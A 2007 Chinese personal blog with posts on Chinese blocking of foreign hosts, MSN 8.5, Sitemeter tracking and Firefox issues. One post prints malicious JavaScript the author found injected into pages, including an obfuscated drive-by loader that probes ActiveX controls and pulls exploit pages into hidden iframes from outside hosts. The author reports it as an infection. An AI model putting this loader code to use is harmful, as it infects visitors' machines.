在hostgator被屏蔽的第二天,Technorati解封了,其实前段时间,就发现有部分网站陆续解封了。
不知道解封的原因是不是Technorati和google.cn一样做了部分妥协。
暂时带www的地址无法访问,不带则使用正常,这是江苏电信的测试结果。
Technorati Tags: Technorati
6月 13th, 2007 by Antonio
既bluehost被封后,hostgator步了后尘。
询问了数人,电信无法访问,网通某些地区可以打开。能想到的唯一原因就是,hostgator允许放置成人站点,不过这是治标不治本的方法,国外成人主机商何止万千,封锁永远不是解决问题的方法。现在要命的事,我还订购了一个hostgator的虚拟主机,无法登录SSL加密的控制面板,庆幸的是前个月用paypal订阅了季度支付。
希望这只是严打下的一个过程,风暴过后还能再次看到解封。
MSN8.5已经发布数周了,最近才拿起来试用,在IBM的笔记本上安装了一切运转良好,功能上可能使用不太多,对其感觉不是太多。
更多的改变来自与界面
比8.0成熟很多了。
不过这里提醒各位使用非正版XP的用户,安装MSN8.5以后,可能会出现一个盗版提示,后果是导致XP系统大部分功能丧失。
Technorati Tags: MSN
因为遇到firefox无法下载文件无法管理的问题,重新下载了2.0.0.4英文版的安装了下,结果又遭遇劫持事件。
安装以后发现打开含有google adsense的页面全部还有第三方的JS,来自于y66.us。
HTML:
-
<script src=http://y66.us/2.js></script>
打开这个JS,是一段框架代码
HTML:
-
document.writeln("<script src=\"http:\/\/y66.us\/oK\/Vernum.js\"><\/script>");
-
document.writeln("</script><script>");
-
document.writeln("function Start(){");
-
document.writeln("var Then = new Date() ");
-
document.writeln("Then.setTime(Then.getTime() + 24*60*60*1000)");
-
document.writeln("var cookieString = new String(document.cookie)");
-
document.writeln("var cookieHeader = \"Cookie1=\" ");
-
document.writeln("var beginPosition = cookieString.indexOf(cookieHeader)");
-
document.writeln("if (beginPosition != -1){ ");
-
document.writeln("} else ");
-
document.writeln("{ document.cookie = \"Cookie1=POPWINDOS;expires=\"+ Then.toGMTString() ");
-
document.writeln("document.writeln(\"<iframe height=0 width=0 src=\\\"http:\\\/\\\/y66.us\\\/oK\\\/oKT.asp\\\"><\\\/iframe>\");");
-
document.writeln("document.writeln(\"</iframe><iframe height=0 width=0 src=\\\"http:\\\/\\\/y66.us\\\/oK\\\/oKT.asp\\\"><\\\/iframe>\");");
-
document.writeln("}");
-
document.writeln("}");
-
document.writeln("Start();");
-
document.writeln("<\/script>")
感觉这段代码不会对我的电脑带来任何益处,询问了下,不是google adsense的问题,那就是我的浏览器出了问题。立即把firefox的所有缓存都清除,并卸载了firefox,整机杀了下毒,并没发现什么。重新下载安装中文版的,一切又恢复了正常。 
比较奇怪,一直比较谨慎,安装了no script,很少会自动运行不正常网站的代码,也不知道是在哪中招了。
暂时可以使用Anti ARP Sniffer预防这一问题。
2007.10.18 Update: 今天又碰到类似的劫持
js来自
HTML:
-
<script src=http://rb.vg/1.js></script>
JS代码为
HTML:
-
var vDA1 = new window["\x44\x61\x74\x65"]()
-
vDA1["\x73\x65\x74\x54\x69\x6d\x65"](vDA1["\x67\x65\x74\x54\x69\x6d\x65"]() + 24*60*60*1000)
-
var eOTo$2 = new window["\x53\x74\x72\x69\x6e\x67"](window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x63\x6f\x6f\x6b\x69\x65"])
-
var eZT3 = "\x43\x6f\x6f\x6b\x69\x65\x31\x3d"
-
var VMliYvVKu4 = eOTo$2["\x69\x6e\x64\x65\x78\x4f\x66"](eZT3)
-
if (VMliYvVKu4 == -1)
-
{
-
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x63\x6f\x6f\x6b\x69\x65"] = "\x43\x6f\x6f\x6b\x69\x65\x31\x3d\x50\x4f\x50\x57\x49\x4e\x44\x4f\x53\x3b\x65\x78\x70\x69\x72\x65\x73\x3d"+ vDA1["\x74\x6f\x47\x4d\x54\x53\x74\x72\x69\x6e\x67"]()
-
try{if(new ActiveXObject("\x4d\x69\x63\x72\x6f\x73\x6f\x66\x74\x2e\x58\x4d\x4c\x48\x54\x54\x50"))window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65"]('\x3c\x73\x63\x72\x69\x70\x74 \x73\x72\x63\x3d\x22\x68\x74\x74\x70\x3a\/\/\x4e\x6f\x50\x2e\x67\x73\/\x73\x33\x36\x38\/\x4e\x65\x77\x4a\x73\x31\x2e\x6a\x73\x22\x3e\x3c\/\x73\x63\x72\x69\x70\x74\x3e');}catch(e){} // ms06014
-
try{if(new ActiveXObject("\x44\x50\x43\x6c\x69\x65\x6e\x74\x2e\x56\x6f\x64"))window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65"]('\x3c\x69\x66\x72\x61\x6d\x65 \x73\x74\x79\x6c\x65\x3d\x64\x69\x73\x70\x6c\x61\x79\x3a\x6e\x6f\x6e\x65 \x73\x72\x63\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x4e\x6f\x50\x2e\x67\x73\x2f\x73\x33\x36\x38\x2f\x74\x33\x36\x38\x6f\x6b\x2e\x67\x69\x66\x22\x3e\x3c\x2f\x69\x66\x72\x61\x6d\x65\x3e');}catch(e){} // XL
-
try{if(new ActiveXObject("\x4d\x50\x53\x2e\x53\x74\x6f\x72\x6d\x50\x6c\x61\x79\x65\x72\x2e\x31"))window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65"]('\x3c\x69\x66\x72\x61\x6d\x65 \x73\x74\x79\x6c\x65\x3d\x64\x69\x73\x70\x6c\x61\x79\x3a\x6e\x6f\x6e\x65 \x73\x72\x63\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x4e\x6f\x50\x2e\x67\x73\x2f\x73\x33\x36\x38\x2f\x47\x6f\x33\x36\x38\x2e\x67\x69\x66\x22\x3e\x3c\x2f\x69\x66\x72\x61\x6d\x65\x3e');}catch(e){} // BF
-
try{if(new ActiveXObject("\x50\x4f\x57\x45\x52\x50\x4c\x41\x59\x45\x52\x2e\x50\x6f\x77\x65\x72\x50\x6c\x61\x79\x65\x72\x43\x74\x72\x6c\x2e\x31"))window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65"]('\x3c\x69\x66\x72\x61\x6d\x65 \x73\x74\x79\x6c\x65\x3d\x64\x69\x73\x70\x6c\x61\x79\x3a\x6e\x6f\x6e\x65 \x73\x72\x63\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x4e\x6f\x50\x2e\x67\x73\x2f\x73\x33\x36\x38\x2f\x54\x33\x36\x38\x2e\x67\x69\x66\x22\x3e\x3c\x2f\x69\x66\x72\x61\x6d\x65\x3e');}catch(e){} // PPS
-
try{if(new ActiveXObject("\x50\x64\x67\x32"))window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65"]('\x3c\x69\x66\x72\x61\x6d\x65 \x73\x74\x79\x6c\x65\x3d\x64\x69\x73\x70\x6c\x61\x79\x3a\x6e\x6f\x6e\x65 \x73\x72\x63\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x4e\x6f\x50\x2e\x67\x73\x2f\x73\x33\x36\x38\x2f\x72\x65\x61\x64\x65\x72\x33\x36\x38\x2e\x67\x69\x66\x22\x3e\x3c\x2f\x69\x66\x72\x61\x6d\x65\x3e');}catch(e){} // CX
-
try{if(new ActiveXObject("\x47\x4c\x43\x48\x41\x54\x2e\x47\x4c\x43\x68\x61\x74\x43\x74\x72\x6c\x2e\x31"))window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65"]('\x3c\x69\x66\x72\x61\x6d\x65 \x73\x74\x79\x6c\x65\x3d\x64\x69\x73\x70\x6c\x61\x79\x3a\x6e\x6f\x6e\x65 \x73\x72\x63\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x4e\x6f\x50\x2e\x67\x73\x2f\x73\x33\x36\x38\x2f\x4c\x69\x6e\x6b\x33\x36\x38\x2e\x67\x69\x66\x22\x3e\x3c\x2f\x69\x66\x72\x61\x6d\x65\x3e');}catch(e){} // LZ
-
try{if(new ActiveXObject("\x42\x61\x69\x64\x75\x42\x61\x72\x2e\x54\x6f\x6f\x6c\x2e\x31"))window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65"]('\x3c\x69\x66\x72\x61\x6d\x65 \x73\x74\x79\x6c\x65\x3d\x64\x69\x73\x70\x6c\x61\x79\x3a\x6e\x6f\x6e\x65 \x73\x72\x63\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x4e\x6f\x50\x2e\x67\x73\x2f\x73\x33\x36\x38\x2f\x50\x69\x63\x33\x36\x38\x2e\x67\x69\x66\x22\x3e\x3c\x2f\x69\x66\x72\x61\x6d\x65\x3e');}catch(e){} // Baidu
-
}
疑为局域网ARP病毒。
以前一直使用Sitemeter的统计服务,直到前段时间,发现安装sitemeter统计的网站会多一条来自specificclick.net的js。感觉不太舒服就移除了。
最近打开其首页的时候,发现本来PR6的sitemeter变成了0,打开google,site和link了一下,没有任何结果,看似被google屏蔽了,搜索了下,是与安插间谍软件有关。
据说,安插这个JS对使用者本身不会造成破坏,但会记录访客的信息。不过被加入第三方的监查软件始终不那么让人愉快,如果您在使用sitemeter的服务,不妨查看下是否有第三方的JS,在firefox浏览器下安装No Script插件,就可以查看到是否有多于的JS。
经过一个多月的“治理”,屏蔽来屏蔽去后,不知道是良心发现还是风头过去,有部分境外的IP被解封了,像sitepoint又一次能被电信访问了。
前一阶段,有个很特殊的关键字造成以前只有10人访问的小博客一下拥有每天100多次的访问量,而绝大部分的页面都停留在这个页面上,我能想像有部分网警是通过这个关键字在寻找网络污秽。所以被GFW屏蔽的关键字又一次能被搜索到,真是出乎人的意料,更出乎人意料的是,它可能是为了配合这次的“整治”。 
升级这个版本的firefox已经几周了,一直使用良好,但最近突然发现有个下载图片的bug。
当然保存图片到本地是,发现它根本没有储存
就算你在设置里把储存图片的路径设置好,还是保存不了。不知道是否有人也有类似问题,还是就我个人的问题。
